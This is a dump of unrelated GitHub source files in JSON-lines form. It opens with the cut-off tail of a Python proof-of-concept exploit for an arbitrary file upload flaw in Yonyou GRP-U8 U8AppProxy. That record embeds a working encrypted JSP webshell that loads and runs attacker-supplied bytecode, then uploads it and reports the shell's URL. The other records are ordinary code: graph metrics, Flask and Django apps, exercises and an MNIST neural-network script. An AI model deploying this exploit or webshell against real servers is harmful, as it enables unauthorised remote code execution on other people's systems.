Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68\",\r\n \"Accept-Encoding\": \"gzip, deflate\"\r\n }\r\n shell_content = '<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>'\r\n\r\n files = [('file', ('hello_U8.jsp', shell_content, 'application/octet-stream'))]\r\n response = requests.post(target, files=files, headers=headers, timeout=30, verify=False)\r\n webshell = urljoin(url, \"hello_U8.jsp\")\r\n response = requests.get(webshell, headers=headers, timeout=30, verify=False)\r\n if response.status_code == 200:\r\n print(\"[+] 存在NC_U8AppProxy任意文件上传漏洞,即将上传webshell\")\r\n print(\"[+] 文件上传成功!\")\r\n print(\"[+] webshell: \" + webshell)\r\n if response.status_code == 403:\r\n print(\"[-] 文件上传成功,但访问被拦截!\")\r\n\r\n\r\ndef _init():\r\n global url\r\n banner()\r\n usage = '\\n\\t' \\\r\n 'python3 %prog -u domain.com\\n\\t' \\\r\n\r\n parse = OptionParser(usage=usage)\r\n parse.add_option('-u', '--url', dest='url', type='string', help='target url')\r\n options, args = parse.parse_args()\r\n url = options.url\r\n if url:\r\n main(url)\r\n\r\nif __name__ == '__main__':\r\n\r\n _init()\r\n\r\n\r\n # if (args.check_file):\r\n # multithreading(main, args.check_file, 8)\r\n","repo_name":"Londly01/poc-hub","sub_path":"用友 GRP-U8 U8AppProxy 任意文件上传漏洞/londly.py","file_name":"londly.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"17699306264","text":"from queue import Queue\nfrom functools import reduce\nimport numpy as np\nimport scipy.linalg\nimport networkx as nx\n\n# Calculates G, or the survival fitness function, for a given graph g\n# Input: A graph\n# Output: A fitness score\ndef evaluate(g, alpha):\n normEff = efficiency(g)\n normRob = robustness(g)\n return alpha * normEff + (1 - alpha) * normRob\n\n# Calculates the efficiency of the graph by analyzing distances between every pair of\n# nodes. 
This uses the Floyd Warshall algorithm.\n# Note: if an invalid graph is given, it returns -1\n# Input: A graph\n# Output: The efficiency value\ndef efficiency(g):\n    \"\"\" Calculates the efficiency of the graph by analyzing distances between every pair of nodes\n    using the Floyd Warshall Algorithm\n    \"\"\"\n    if (g.n <= 1): # Graphs with just one node have no efficiency\n        return -1\n\n    # Find the distance for every pair of nodes\n    dist = [[0 for c in range(g.n)] for r in range(g.n)]\n    INF = 999\n\n    # Set missing edges to infinity\n    for r in range(g.n):\n        for c in range(g.n):\n            dist[r][c] = g.adj[r][c]\n            if r != c and g.adj[r][c] == 0: # No edge exists between r and c\n                dist[r][c] = INF\n\n    # Floyd Warshall\n    for k in range(g.n):\n        for i in range(g.n):\n            for j in range(g.n):\n                dist[i][j] = min(dist[i][j], dist[i][k] + dist[k][j])\n\n    # Reset edges that are infinity\n    for r in range(g.n):\n        for c in range(g.n):\n            if dist[r][c] == INF:\n                dist[r][c] = 0\n\n    # Calculation for average APSP for the given graph\n    APSP = 0\n    for r in dist:\n        APSP += reduce(lambda x, y: x + y, r)\n    APSP /= g.n * (g.n - 1)\n\n    # APSP for a star\n    starAPSP = 2 * (1 - 1 / g.n)\n\n    # SECON metric\n    # return starAPSP / APSP\n\n    # New metric\n    return 1 / APSP\n\n# Calculates the structural and functional robustness of a graph\n# Input: A graph\n# Output: The robustness value\ndef robustness(g):\n    \"\"\" Calculates the structural and functional robustness of a graph by iterating and removing each node\n    \"\"\"\n    strucR = [0] * g.n # Structural robustness with respect to each node\n    # funcR = [0] * g.n # Functional robustness\n\n    # removes each node one-by-one\n    for j in range(g.n):\n        modifiedAdj = []\n\n        for r in range(g.n):\n            if r != j:\n                tmpArr = []\n                for c in range(g.n):\n                    if c != j:\n                        tmpArr.append(g.adj[r][c])\n                modifiedAdj.append(tmpArr)\n        results = robustnessStack(modifiedAdj)\n\n        # SECON metric\n        # strucR[j] = results / (g.n - 2)\n\n        # New metric: Number of neighbors\n        neighbors = 0\n        for r in range(g.n):\n            if r != j and g.adj[j][r]:\n                neighbors += 1\n        strucR[j] = (results / (g.n - 2)) * neighbors / (g.e * 2)\n\n    # SECON metric\n    # return min(strucR)\n\n    # New metric\n    return sum(strucR)\n\n# A robustness helper function that runs a DFS on the graph to populate a stack\n# before running the individual functional and structural robustness calculations\n# Input: An adjacency matrix\n# Output: [functional robustness, structural robustness]\ndef robustnessStack(adj):\n    \"\"\" Runs a Depth-First Search on a Graph to Populate a stack\n    before running the individual functional and structural\n    robustness calculations\n    \"\"\"\n    visited = [False] * len(adj)\n    stack = []\n\n    for i in range(len(adj)):\n        if visited[i] == False:\n            dfsStackRecurse(adj, i, visited, stack)\n\n    transposeAdj = transpose(adj)\n    # return [functionalRobustness(transposeAdj, list(stack), adj),\n    #         structuralRobustness(transposeAdj, list(stack))]\n    return structuralRobustness(transposeAdj, stack)\n\n# Calculates the functional robustness with respect to vertex j\n# for a given graph (with vertex j removed, presumably)\n# TODO: Too inefficient time-wise (30x closer than structural calculation)\n# Input: A transposed adjacency matrix of a graph, stack from DFS, original adjacency matrix\n# Output: Functional robustness of the graph\ndef functionalRobustness(transposeAdj, stack, adj):\n    \"\"\" Calculates functional robustness with respect to vertex j\n    \"\"\"\n    visited = [False] * len(adj)\n    largestSCC = []\n\n    while len(stack) > 0:\n        i = stack.pop()\n        if visited[i] == False:\n            tempSCC = dfsSCCRecurse(transposeAdj, i, visited)\n            if len(tempSCC) > len(largestSCC):\n                largestSCC = tempSCC\n\n    # Create new graph with just the largest SCC\n    newAdj = []\n    newEdges = 0\n    for i in largestSCC:\n        tmpArr = []\n        for j in largestSCC:\n            if i == j:\n                tmpArr.append(0)\n            else:\n                tmpArr.append(adj[i][j])\n                newEdges += adj[i][j]\n        newAdj.append(tmpArr)\n\n    newG = Graph(len(newAdj), newEdges, True, False)\n    newG.adj = newAdj\n    return efficiency(newG)\n\n# Calculates the effective accessibility of a graph.\n# It does this by computing two DFS using Kosaraju's algorithm\n# Input: A transposed adjacency matrix for a graph, stack from DFS\n# Output: The effective accessibility of the graph\ndef structuralRobustness(transposeAdj, stack):\n    visited = [False] * len(transposeAdj)\n    accessibility = 0\n\n    while len(stack) > 0:\n        i = stack.pop()\n        if visited[i] == False:\n            accessibility += len(dfsSCCRecurse(transposeAdj, i, visited)) - 1\n    return accessibility\n\n# Runs a DFS of the graph and populates a stack with deepest nodes first\n# Input: Adjacency matrix, node, boolean array of visited values, stack\n# Output: Nothing\ndef dfsStackRecurse(adj, i, visited, stack):\n    visited[i] = True\n    for j in range(len(adj[i])):\n        if adj[i][j] == 1 and visited[j] == False:\n            dfsStackRecurse(adj, j, visited, stack)\n    stack.append(i)\n\n# Runs a DFS on a graph and sums up the number of nodes of the strongly\n# connected component (SCC) that contains node i\n# Input: Adjacency matrix, node, boolean array of visited values\n# Output: Nodes in the respective SCC (array)\ndef dfsSCCRecurse(adj, i, visited):\n    visited[i] = True\n    components = [i]\n    for j in range(len(adj[i])):\n        if adj[i][j] == 1 and visited[j] == False:\n            components += dfsSCCRecurse(adj, j, visited)\n    return components\n\n# Check if a graph is connected. Uses Kosaraju algorithm for BFS.\n# Input: Adjacency matrix\n# Output: Boolean\ndef isConnected(adj):\n    if len(adj) == 0:\n        return True\n\n    if not bfs(adj):\n        return False\n\n    transposeAdj = transpose(adj)\n    return bfs(transposeAdj)\n\n\n# Breadth first search that always starts with node 0\n# Input: Adjacency matrix\n# Output: Boolean for if it visited every node from 0 via BFS\ndef bfs(adj):\n    if len(adj) == 0:\n        return True\n\n    explored = [0] * len(adj)\n    q = Queue(len(adj) ** 2)\n    q.put_nowait(0)\n\n    while not q.empty():\n        n = q.get_nowait() # Visit node\n        if explored[n] == 0:\n            explored[n] = 1\n            # Find neighbors\n            for neighbor in range(len(adj[n])):\n                if adj[n][neighbor] > 0:\n                    q.put(neighbor)\n\n    for nodeState in explored:\n        if nodeState == 0:\n            return False\n    return True\n\n# Transpose an adjacency matrix\n# Input: Adjacency matrix\n# Output: Transposed adjacency matrix\ndef transpose(adj):\n    return [[adj[j][i] for j in range(len(adj))] for i in range(len(adj[0]))]\n\n# Percolation theory based robustness index: in accordance with Cohen et al. 
(2000) as seen in Van der Meer article\ndef percolation_limit(adj):\n    adj = np.asarray(adj)\n    D = np.asarray([np.sum(row) for row in adj])\n    N = len(D)\n    k0_avg = sum(D)/N\n    k02_avg = sum(D**2)/N\n    kappa = k02_avg/k0_avg\n    pc = max(0,1 - (1/(kappa - 1)))\n    return pc\n\n\n\n## Entropy as a robustness metric\n# Von Neumann Entropy of the graph\ndef VN_Entropy(adj):\n    adj = np.asarray(adj)\n    D = np.diag(np.array([np.sum(row) for row in adj]))\n    N = len(D)\n    L = D - adj\n    Dtemp = D.tolist()\n    Dtemp = [item for sublist in Dtemp for item in sublist]\n    D5 = [(item**(-.5) if item > 0 else 0) for item in Dtemp] # works because diagonal matrix - otherwise would have to use inverse for negation\n    D5 = np.asarray(D5)\n    D5.shape = (N, N)\n    Lhat = np.asmatrix(D5) * np.asmatrix(L) * np.asmatrix(D5)\n    rho = Lhat / N\n    Hvn = -np.trace(np.asmatrix(rho) * scipy.linalg.logm(np.asmatrix(rho)))\n    return Hvn\n\n## Degree distribution Entropy: Only non-weighted adjacency\n# Same importance == Highest entropy. Importance <-> Degree dependent\ndef Entropy_imp(adj):\n    adj = np.asarray(adj)\n    D = np.asarray([np.sum(row) for row in adj])\n    N = len(D)\n    Dn = D/sum(D)\n    return -sum(Dn*np.log2(Dn))\n\n# More diverse degree distribution, greater the entropy\ndef Degree_Entropy(adj):\n    Pn = Degree_Distribution(adj)\n    ndeg = len(Pn)\n    S = 0\n    for i in range(ndeg):\n        if Pn[i]!=0:\n            S = S - Pn[i]*np.log2(Pn[i])\n\n    return S\n    # P = zeros(N,N) # Probability matrix, Pij is the probability that ith node has degree j\n\n## Graph characteristics\ndef Degree_Distribution(adj):\n    #adj should be int type \n    adj = np.asarray(adj)\n    D = np.asarray([np.sum(row) for row in adj])\n    P = np.bincount(D)\n    return P/sum(P)\n\n# def Clustering(adj):\n","repo_name":"Columbia-CRIS/Intern","sub_path":"Adaptive-Complex-Networks/Network-Analysis/Evaluator/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":9391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
{"seq_id":"22252803705","text":"class Person:\n    def __init__(self, name, age):\n        self.name = name\n        self.age = age\n\n    def say_hello(self):\n        print(f'Hello, my name is {self.name} and I am {self.age} years old')\n\n\nif __name__ == '__main__':\n    Miguel = Person('Miguel', 22)\n\n    print(f'Age: {Miguel.age}')\n    print(f'Name: {Miguel.name}')\n    Miguel.say_hello()","repo_name":"Mike-droid/crud-python","sub_path":"personas.py","file_name":"personas.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"34812631590","text":"from wusn.commons import WusnOutput, WusnInput\n\n\ndef lurns1(inp: WusnInput) -> WusnOutput:\n    sensors = inp.sensors\n    in_relays = inp.relays[:]\n    Y = inp.relay_num\n    out_relays = []\n    out_relays_to_sensors = {}\n    loss = inp.loss # L(sn, rn) = loss[(sn, rn)]\n\n    print(\"Starting LURNS-1...\")\n    while len(out_relays) < Y:\n        min_T = float(\"inf\")\n        best_rn = None\n        for fq in in_relays:\n            losses = []\n            for id1, sn in enumerate(sensors):\n                Ts = float('inf')\n                for rn in out_relays + [fq]:\n                    ls = loss[(sn, rn)]\n                    if ls < Ts:\n                        Ts = ls\n                losses.append(Ts)\n            Tc = max(losses)\n            if Tc < min_T:\n                min_T = Tc\n                best_rn = fq\n        print('[%d] Picked relay: %s' % (len(out_relays), best_rn))\n        out_relays.append(best_rn)\n        in_relays.remove(best_rn)\n\n    # Assign each sensor node (sn) to a relay node (rn)\n    for rn in out_relays:\n        out_relays_to_sensors[rn] = []\n\n    for sn in sensors:\n        t_min = float(\"inf\")\n        best_rn = None\n        for rn in out_relays:\n            ls = loss[(sn, rn)]\n            if ls < t_min:\n                t_min = ls\n                best_rn = rn\n        out_relays_to_sensors[best_rn].append(sn)\n\n    # Result\n    out = WusnOutput(inp, sensors, out_relays, out_relays_to_sensors)\n    return out\n","repo_name":"lanPN85/wusn","sub_path":"wusn/yuan/lurns/lurns1.py","file_name":"lurns1.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"}
{"seq_id":"16260005625","text":"\nimport numpy\nimport pandas as pd\nimport datetime as dt\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nfrom flask import Flask, jsonify\n\n# Database Setup\n## reflect an existing database into a new model\nengine = create_engine('sqlite:///Resources/hawaii.sqlite')\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save references to each table\nMeasurement = Base.classes.measurement\nstation = Base.classes.station\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n# Create a Flask app\napp = Flask(__name__)\n\n# Flask Routes\n@app.route(\"/\")\ndef home():\n    print(\"Server requested climate app home page...\")\n    return (\n        f\"Welcome to the Climate Analysis App!
\"\n f\"----------------------------------
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation(): \n # Calculate the date one year from the last date in data set.\n prev_year = dt.date(2017,8,23) - dt.timedelta(days=365) \n\n # query to retrieve all the date and precipitation values\n results = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= prev_year).all()\n \n #Dictionary with date as the key and prcp as the value\n precip = {date: prcp for date, prcp in results}\n return jsonify(precip)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n #results = session.query(Station.station).all()\n results = session.query(station.id, station.station, station.name).all()\n\n list_stations = []\n \n for st in results:\n station_dict = {}\n\n station_dict[\"id\"] = st[0]\n station_dict[\"station\"] = st[1]\n station_dict[\"name\"] = st[2]\n\n list_stations.append(station_dict)\n\n # Return a JSON list of stations from the dataset.\n return jsonify(list_stations) \n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"LiteshSamji/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13664887355","text":"from .base import * # noqa\n\nDEBUG = True\n\nALLOWED_HOSTS = [\"*\"]\n\nINSTALLED_APPS += [\"debug_toolbar\"] # noqa\n\nMIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"] # noqa\n\nDEBUG_TOOLBAR_CONFIG = {\n \"SHOW_TOOLBAR_CALLBACK\": (\n lambda request: request.headers.get(\"x-requested-with\") != \"XMLHttpRequest\"\n and request.path != \"/\" # noqa: E731\n )\n}\n\n\nEMAIL_BACKEND = \"django.core.mail.backends.smtp.EmailBackend\"\n\nEMAIL_HOST = \"smtp-server\"\nEMAIL_PORT = \"1025\"\n","repo_name":"bjvta/iainteractive-python","sub_path":"src/iainteractive/settings/develop.py","file_name":"develop.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18575205238","text":"import json\n\ndicionario = {\n \"chaves\" : [\"Chaves do 8\", \"14/04/2016\", \"Recep_01\"],\n \"quico\" : [\"Quico das Flores\", \"24/12/2017\", \"Raiox_03\"],\n \"florinda\" : [\"Dona Florinda\", \"18/12/2017\", \"Raiox_02\"]\n}\n\nwith open(\"db1.json\", \"w\") as json_file:\n json.dump(dicionario, json_file)","repo_name":"dihogoteixeira/fiap-ctp-exercises","sub_path":"Manipulacao_Arquivos/ManageJsonFile.py","file_name":"ManageJsonFile.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29461177989","text":"def jerigonzo(texto):\n resultado = \"\"\n for caracter in texto:\n if caracter.lower() in \"aeiouáéíóú\":\n resultado += caracter + \"p\" + caracter.lower()\n else:\n resultado += caracter\n return resultado\n\nif __name__ == \"__main__\":\n texto = input(\"Ingrese un texto: \")\n resultado_jerigonzo = jerigonzo(texto)\n print(\"Texto traducido al jerigonzo:\", resultado_jerigonzo)\n\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema4_ej3/tema4_ej3_649009ada26aa1068e83e02c64d93189.py","file_name":"tema4_ej3_649009ada26aa1068e83e02c64d93189.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38885237855","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.utils.decorators import 
decorator_from_middleware\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\n\nfrom ...middleware.auth_strategy import AuthStrategyMiddleware\nfrom ..models import EndUser, Location\nfrom ..serializers import LocationSerializer\n\n\n@csrf_exempt\n@api_view(['DELETE'])\n@decorator_from_middleware(AuthStrategyMiddleware)\ndef delete_existing_location(request, location_id):\n    try:\n        existing_location = Location.objects.get(\n            id=location_id, user__id=request.user.id)\n        existing_location.delete()\n        return JsonResponse({\n            'success': True,\n            'message': 'Successfully deleted location for user'\n        }, status=status.HTTP_200_OK)\n    except Location.DoesNotExist:\n        return JsonResponse({\n            'success': False,\n            'message': 'Location with given id does not exist'\n        }, status=status.HTTP_400_BAD_REQUEST)\n    except Exception as e:\n        return JsonResponse({\n            'success': False,\n            'message': str(e)\n        }, status=status.HTTP_404_NOT_FOUND)\n\n\n@csrf_exempt\n@api_view(['PATCH'])\n@decorator_from_middleware(AuthStrategyMiddleware)\ndef edit_existing_location(request, location_id):\n    data = json.loads(request.body)\n    try:\n        existing_location = Location.objects.get(\n            id=location_id, user__id=request.user.id)\n        if 'location' in data:\n            existing_location.location = data['location']\n        if 'start_year' in data:\n            existing_location.start_year = data['start_year']\n        if 'end_year' in data:\n            existing_location.end_year = data['end_year']\n        existing_location.save()\n        return JsonResponse({\n            'success': True,\n            'message': 'Successfully updated existing location data',\n            'location': LocationSerializer(existing_location).data\n        }, status=status.HTTP_202_ACCEPTED)\n    except Location.DoesNotExist:\n        return JsonResponse({\n            'success': False,\n            'message': 'Location with given id does not exist'\n        }, status=status.HTTP_400_BAD_REQUEST)\n    except Exception as e:\n        return JsonResponse({\n            'success': False,\n            'message': str(e)\n        }, status=status.HTTP_404_NOT_FOUND)\n\n\n@csrf_exempt\n@api_view(['PUT'])\n@decorator_from_middleware(AuthStrategyMiddleware)\ndef add_new_location(request):\n    data = json.loads(request.body)\n    try:\n        location = data['location']\n        start_year = data['start_year']\n        end_year = None\n        if 'end_year' in data:\n            end_year = data['end_year']\n        location_count = Location.objects.filter(\n            user__id=request.user.id).count()\n        if location_count >= 3:\n            return JsonResponse({\n                'success': False,\n                'message': 'Only recent 3 location data are allowed. 
Please delete other locations and then add new one'\n            }, status=status.HTTP_403_FORBIDDEN)\n        endUser = request.user\n        new_location = Location.objects.create(\n            user=endUser, location=location, start_year=start_year, end_year=end_year)\n        return JsonResponse({\n            'success': True,\n            'message': 'Successfully added new location',\n            'location': LocationSerializer(new_location).data\n        }, status=status.HTTP_201_CREATED)\n    except KeyError:\n        return JsonResponse({\n            'success': False,\n            'message': 'Please provide all data'\n        }, status=status.HTTP_400_BAD_REQUEST)\n    except Exception as e:\n        return JsonResponse({\n            'success': False,\n            'message': str(e)\n        }, status=status.HTTP_404_NOT_FOUND)\n","repo_name":"souptik4572/JustAskIt","sub_path":"api/user/views/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"26140792514","text":"'''\r\nThis problem asks for the kth largest element.\r\nPython ships with the heapq module: heapq.heapify(list) builds a min-heap,\r\nso heapq.heappop(list) always pops the lowest-priority element first. The overall time complexity is O(nlogN).\r\nThe program ran in 44ms, beating 94.56% of users.\r\n'''\r\nimport heapq\r\ndef findKthLargest(nums, k):\r\n\t\"\"\"\r\n\t:type nums: List[int]\r\n\t:type k: int\r\n\t:rtype: int\r\n\t\"\"\"\r\n\theapq.heapify(nums)\r\n\tfor i in range(len(nums)-k): \r\n\t\theapq.heappop(nums)\r\n\treturn heapq.heappop(nums)\r\n\r\n'''\r\nThe solution above relies on a module already built into Python.\r\nWithout the built-in heap module, the idea of quicksort can be borrowed instead; the time complexity is likewise O(nlogN).\r\nThe running time is also 44ms.\r\n'''\r\nfrom random import randint\r\ndef findKthLargest(nums, k):\r\n    pivot = randint(0 , len(nums) - 1) # randomly pick a number to compare against\r\n    left = [l for l in nums if l < nums[pivot]]\r\n    equal = [e for e in nums if e == nums[pivot]]\r\n    right = [r for r in nums if r > nums[pivot]]\r\n\r\n    if k <= len(right): # the Kth largest number lies among the values greater than the pivot\r\n        return findKthLargest(right, k)\r\n    elif (k - len(right)) <= len(equal):\r\n        return equal[0]\r\n    else:\r\n        return findKthLargest(left, k - len(right) - len(equal))\r\n","repo_name":"justanewbieC/cc-leetcode","sub_path":"LeetCode 201-300/215-Kth-Largest-Element-in-an-Array.py","file_name":"215-Kth-Largest-Element-in-an-Array.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"19176468706","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\napp = Flask(__name__)\n\n@app.route('/planets', methods=['POST', 'GET'])\ndef planets():\n\tsearchword = request.args.get('search', '')\n\tif (searchword == 'Mars'):\n\t\treturn render_template('deathstarcustom2.html')\n\telse:\n\t\treturn render_template('deathstarcustom.html')\n\n\nif __name__ == '__main__':\n    app.run()","repo_name":"sambeckett303/RapidPrototyping","sub_path":"flask/deathstar.py","file_name":"deathstar.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"19857555068","text":"import math\nimport pickle\nimport sys\nfrom typing import Optional, Callable\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\nfrom pyro import nn\nfrom pyro.infer import SVI, Trace_ELBO\nfrom pyro.infer.autoguide import AutoDiagonalNormal\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import datasets, transforms\nfrom tqdm import tqdm\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom bnn_utils import *\n\npyro.set_rng_seed(101)\n\n\ndef test_nn(model, test_loader):\n    correct = []\n    with 
torch.no_grad():\n for i, batch in enumerate(test_loader):\n probs = model(batch[0])\n y_pred = torch.argmax(probs, dim=1)\n correct.append(y_pred == batch[1])\n correct = torch.cat(correct)\n acc = correct.to(dtype=torch.float32).mean().item()\n return acc\n\n\ndef train_nn(model, train_loader, val_loader, num_epochs=1, learning_rate=1e-3):\n len_train = len(train_loader)\n pbar = tqdm(range(num_epochs * len_train))\n losses = []\n accs = []\n acc = 0\n\n optimizer = Adam(model.parameters(), lr=learning_rate)\n\n for epoch in range(num_epochs):\n for i, batch in enumerate(train_loader):\n optimizer.zero_grad()\n\n prediction = model(batch[0])\n loss = F.cross_entropy(prediction, batch[1])\n loss.backward()\n optimizer.step()\n\n losses.append(loss)\n pbar.update()\n pbar.set_postfix_str(f\"e={epoch+1}, b={(i+1):d}/{len_train:d}, loss={loss:.3f}, acc={acc:.3f}\")\n acc = test_nn(model, val_loader)\n accs.append(acc)\n\n sys.stderr.flush()\n sys.stdout.flush()\n print()\n return losses, acc, accs\n\n\ndef tune_nn_hyperparameters():\n train_dataset = MNIST_50('./data', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(), ]), length=50000)\n val_dataset = MNIST_50('./data', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(), ]), length=10000, offset=50000)\n test_dataset = datasets.MNIST('./data', train=False, download=True, transform=transforms.Compose([transforms.ToTensor(), ]))\n\n train_loader = DataLoader(train_dataset, batch_size=500, shuffle=False)\n val_loader = DataLoader(val_dataset, batch_size=500, shuffle=False)\n test_loader = DataLoader(test_dataset, batch_size=500, shuffle=False)\n\n\n lrs = torch.tensor([5e-4, 1e-3, 5e-3, 1e-2])\n # lrs = torch.tensor([1e-2])\n\n accss = []\n best_final_acc = 0\n best_index = 0\n best_model = None\n best_lr = 0\n\n for i, lr in enumerate(lrs):\n model = NN(28*28, 100, 10)\n _, acc, accs = train_nn(model, train_loader, val_loader, num_epochs=20, learning_rate=lr)\n accss.append(accs)\n print(f\"LR={lr}, acc={acc:.3f}\")\n\n if acc >= best_final_acc:\n best_final_acc = acc\n best_model = model\n best_index = i\n best_lr = lr\n\n print(f\"Best lr={best_lr}\")\n\n np.savetxt(\"results/accs_nn.csv\", np.array(accss[best_index]))\n\n test_acc = test_nn(model, test_loader)\n print(f\"Final test acc={test_acc:.3f}\")\n\n with open(f\"results/nn.pkl\", \"wb\") as f:\n pickle.dump(best_model, file=f)\n\nif __name__ == \"__main__\":\n print(\"Choose an experiment from above to run\")\n tune_nn_hyperparameters()\n","repo_name":"ATMLGroup1-2021/SGHMC","sub_path":"experiments/mnist_nn.py","file_name":"mnist_nn.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27815885214","text":"\"\"\"Test Initialise Command.\"\"\"\nimport logging\nimport pathlib\nimport subprocess # nosec\nimport typing\n\nimport click.testing\n\nimport templatise.initialise as sut\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass TestMain:\n \"\"\"Test Main Command.\"\"\"\n\n def test_help(self) -> None:\n \"\"\"Test --help.\"\"\"\n runner = click.testing.CliRunner()\n result = runner.invoke(cli=sut.main, args=[\"--help\"])\n assert result.exit_code == 0 # nosec\n\n def test_mock_initialisation(self, project_path: pathlib.Path) -> None:\n \"\"\"Test the whole process with a copy of the working tree.\"\"\"\n runner = click.testing.CliRunner()\n\n result = runner.invoke(\n cli=sut.main,\n args=[\n \"--project-name\",\n 
\"sentinel\",\n \"--path\",\n str(project_path),\n \"--verbosity\",\n \"DEBUG\",\n ],\n )\n\n _LOGGER.debug(\"result.output:\\n%s\", result.output)\n _LOGGER.debug(\"result.exception: %s\", result.exception)\n _LOGGER.debug(\"result.exc_info: %s\", result.exc_info)\n\n assert result.exit_code == 0 # nosec\n\n assert not (project_path / \"templatise\").exists() # nosec\n assert not (project_path / \"templatise_test\").exists() # nosec\n\n assert (project_path / \"sentinel\").exists() # nosec\n assert (project_path / \"sentinel_test\").exists() # nosec\n\n grep = _grep(\n patterns=[\"template.py\", \"template_py\"],\n paths=[project_path],\n options=[\"--invert-match\", \"--recursive\", \"--quiet\"],\n )\n assert grep.returncode == 0 # nosec\n\n\ndef _grep(\n patterns: typing.List[str],\n paths: typing.List[pathlib.Path],\n options: typing.Optional[typing.List[str]] = None,\n): # type: (...) -> subprocess.CompletedProcess[str]\n if not options:\n options = []\n\n result = subprocess.run( # pylint: disable=W1510 # nosec\n [\"grep\", *options, *[f\"-e {pattern}\" for pattern in patterns], *paths],\n capture_output=True,\n text=True,\n )\n\n return result\n","repo_name":"alunduil/template.py","sub_path":"templatise_test/initialise_test.py","file_name":"initialise_test.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"36024923203","text":"# identify data type of values\n# 56, 56.0, \"56\", \"ravi kumar\", 7.8, \"7.8\", 98\n# 1 2 3 4 5 6 7\n\n#2 identify no of variables, values and their data types\na = \"ravi\"\t\t\t\t\t#2.1\nb = 6\t\t\t\t\t\t#2.2\nc = 2\t\t\t\t\t\t#2.3\ndiv = a/b\t\t\t\t\t#2.4\nprint(b, \"/\", c, \"=\", div)\t#2.5\nprint(b, \"+\", c, \"=\", b+c)\t#2.6\t\n\n#identify value, datatype and function\n# 75, int(), int, 3.2, float(), float, str, \"ravi\" , str()\n# 4.1 4.2 4.3 4.4 4.5 4.6 4.7 4.8 4.9 \n\n# var name, its type, value, who give it that val, what function does\na = int(4.7)\t\t\t\t#4.1\nc = float(5)\t\t\t\t#4.2\nf = str(4.2)\t\t\t\t#4.3\nd = float(\"4\")\t\t\t\t#4.4\ne = int(\"3.4\")\t\t\t\t#4.5\n\n#user input\na = input(\"enter number \") #5.1\nprint(a) \t\t\t\t#5.2\n\n#6 comment\na = 7\t\t\t\t\t\t#6.1 \n#a = 2\t\t\t\t\t\t#6.2\nprint(a)\t\t\t\t\t#6.3\n#print(\"hello\")\t\t\t\t#6.4\n\n#7 multi line comment\na = 1\t\t\t\t\t\t#7.1\n'''\na = 2\t\t\t\t\t\t#7.2\na= 3 \n'''\nprint(a)\t\t\t\t\t#7.4\n","repo_name":"parvezk-code/Library","sub_path":"polytechnic/subjects/python/tutorials/revision/rev_01.py","file_name":"rev_01.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 